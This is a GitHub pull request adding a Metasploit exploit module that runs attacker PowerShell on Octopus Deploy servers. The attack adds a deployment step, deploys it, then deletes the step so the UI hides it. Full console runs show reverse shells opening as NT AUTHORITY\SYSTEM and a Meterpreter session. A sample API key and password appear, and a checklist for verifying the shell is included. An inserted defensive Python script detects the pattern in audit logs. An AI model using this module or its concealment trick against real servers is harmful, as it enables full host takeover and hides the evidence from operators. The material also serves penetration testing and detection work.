
Add module to execute powershell on Octopus Deploy server #8390

Merged
merged 1 commit into from May 25, 2017

Conversation

james-otten
Contributor

@james-otten james-otten commented May 16, 2017

Octopus Deploy server allows users with the correct permissions to execute powershell code on the server during a deployment.

During an automated deployment initiated by this module, a powershell based payload is executed in the context of the Octopus Deploy server, which is running as either Local System or a custom domain account. This is done by creating a release that contains a single script step that is run on the Octopus Deploy server. The said script step is deleted after the deployment is started. Though the script step will not be visible in the Octopus Deploy UI, it will remain in the server's database (with lots of other interesting data).

Options for authenticating with the Octopus Deploy server include username and password combination or an api key. Accounts are handled by Octopus Deploy (stored in database) or Active Directory.

More information about Octopus Deploy:
https://octopus.com

Server Setup

Set up Octopus Deploy server - No need to add accounts (end of step 2), or set up application packaging (step 3)
Create a test user/team - Create a team with "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
Create an API key for your user for testing purposes

Example Runs

Username/Password

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) > 

API Key

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) > 

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/http/octopusdeploy_deploy
  • set PATH, RHOST, RPORT, and SSL if needed
  • set STEPNAME if desired
  • set USERNAME and PASSWORD or just APIKEY
  • set payload windows/powershell_reverse_tcp
  • set LHOST
  • run
  • Verify you get a shell with both types of authentication (USERNAME/PASSWORD and APIKEY)
  • Verify the supplied STEPNAME or a random identifier is used for the name of the deployment step added by the module
  • Verify you do not see the step that was created in the Octopus Deploy UI

This is not a bug, but a feature which gives users with the correct
permissions the ability to take over a host running Octopus Deploy.

During an automated deployment initiated by this module, a powershell
based payload is executed in the context of the Octopus Deploy server,
which is running as either Local System or a custom domain account.
This is done by creating a release that contains a single script step
that is run on the Octopus Deploy server. The said script step is
deleted after the deployment is started. Though the script step will
not be visible in the Octopus Deploy UI, it will remain in the server's
database (with lots of other interesting data).

Options for authenticating with the Octopus Deploy server include
username and password combination or an api key. Accounts are handled
by Octopus Deploy (stored in database) or Active Directory.

More information about Octopus Deploy:
https://octopus.com
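The sequence the description lays out (deployment process modified, release created and deployed, deployment process modified again, all by one account within seconds) is exactly what a defender can look for in the server's audit trail, since the step deletion hides it from the UI but not from the event log. The following is an added example, not code from the module or from Octopus Deploy. It assumes audit events shaped like Octopus's event documents with the keys `Occurred`, `Category`, `Username` and `RelatedDocumentIds` (an assumption about field names), and the sample events are constructed to mirror the first example run above:

```python
"""Flag 'transient step' deployments in Octopus Deploy audit events.

Added example. Assumptions: each event is a dict with the keys Occurred
(ISO-8601 UTC), Category, Username and RelatedDocumentIds, mirroring the
shape of Octopus Deploy audit events. The events below are constructed.
"""
from datetime import datetime, timedelta

# How close together "step added" -> "release created" -> "step removed"
# must be to count as one transient-step deployment.
WINDOW = timedelta(minutes=10)

# Constructed sample audit trail (not captured data); ids are assumed shapes.
SAMPLE_EVENTS = [
    {"Occurred": "2017-05-16T02:53:40Z", "Category": "Modified", "Username": "ODUser",
     "RelatedDocumentIds": ["Projects-1", "deploymentprocess-Projects-1"]},
    {"Occurred": "2017-05-16T02:53:52Z", "Category": "Created", "Username": "ODUser",
     "RelatedDocumentIds": ["Projects-1", "Releases-79"]},
    {"Occurred": "2017-05-16T02:53:58Z", "Category": "DeploymentQueued", "Username": "ODUser",
     "RelatedDocumentIds": ["Projects-1", "Releases-79", "Deployments-79"]},
    {"Occurred": "2017-05-16T02:54:05Z", "Category": "Modified", "Username": "ODUser",
     "RelatedDocumentIds": ["Projects-1", "deploymentprocess-Projects-1"]},
    # Benign: a process edit with no release created right after it.
    {"Occurred": "2017-05-16T09:00:00Z", "Category": "Modified", "Username": "alice",
     "RelatedDocumentIds": ["Projects-2", "deploymentprocess-Projects-2"]},
]


def _when(event):
    return datetime.strptime(event["Occurred"], "%Y-%m-%dT%H:%M:%SZ")


def _first_id(event, prefix):
    """Return the first related document id with the given prefix, or None."""
    return next((d for d in event["RelatedDocumentIds"] if d.startswith(prefix)), None)


def _is_process_change(event):
    return event["Category"] == "Modified" and _first_id(event, "deploymentprocess-") is not None


def _is_release_created(event):
    return event["Category"] == "Created" and _first_id(event, "Releases-") is not None


def find_transient_step_deployments(events, window=WINDOW):
    """Return one finding per (process edit, release created, process edit) triple
    performed by the same user on the same project inside `window`."""
    findings = []
    ordered = sorted(events, key=_when)
    for i, first in enumerate(ordered):
        if not _is_process_change(first):
            continue
        key = (_first_id(first, "Projects-"), first["Username"])
        release = None
        for later in ordered[i + 1:]:
            if _when(later) - _when(first) > window:
                break  # events are time-ordered, nothing further can match
            if (_first_id(later, "Projects-"), later["Username"]) != key:
                continue
            if release is None and _is_release_created(later):
                release = later
            elif release is not None and _is_process_change(later):
                findings.append({
                    "project": key[0],
                    "user": key[1],
                    "release": _first_id(release, "Releases-"),
                    "step_added": first["Occurred"],
                    "step_removed": later["Occurred"],
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_transient_step_deployments(SAMPLE_EVENTS):
        print(f"{f['user']} added a step to {f['project']} at {f['step_added']}, "
              f"created {f['release']}, removed the step at {f['step_removed']}")
```

The heuristic keys on the ordering and timing of the events rather than on step names, so it catches a random step name as well as a user-supplied one. Legitimate process edits produce false positives only when a release is cut between two edits within the window, which is a reasonable thing for an operator to review anyway.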
@wchen-r7
Contributor

I'll give this a try. Thanks!

@wchen-r7 wchen-r7 self-assigned this May 18, 2017
@wchen-r7
Contributor

Works for me:

msf exploit(octopusdeploy_deploy) > exploit

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Powershell command length: 2273
[*] Getting available projects
[*] Using project test
[*] Getting steps to test
[*] Adding step EQnSB6xEpEtm48YgSv8 to test
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-3 created
[*] Deploying test version 0.0.3 to test
[*] Getting updated steps to test
[*] Deleting step EQnSB6xEpEtm48YgSv8 from test
[*] Step EQnSB6xEpEtm48YgSv8 deleted
[*] Sending stage (957487 bytes) to 192.168.146.156
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.156:49180) at 2017-05-25 17:30:21 -0500

meterpreter >

@wchen-r7 wchen-r7 merged commit 3c4dfee into rapid7:master May 25, 2017
@wchen-r7
Contributor

I need to add module doc, I also found a typo after I merged. I will do that in a separate PR.

@wchen-r7
Contributor

wchen-r7 commented May 25, 2017

Release Notes

The exploits/windows/http/octopusdeploy_deploy module has been added to the framework. This module exploits a deployment vulnerability in Octopus Deploy. Authentication is required in order to execute a user-supplied Powershell script, which then results in arbitrary remote code execution.
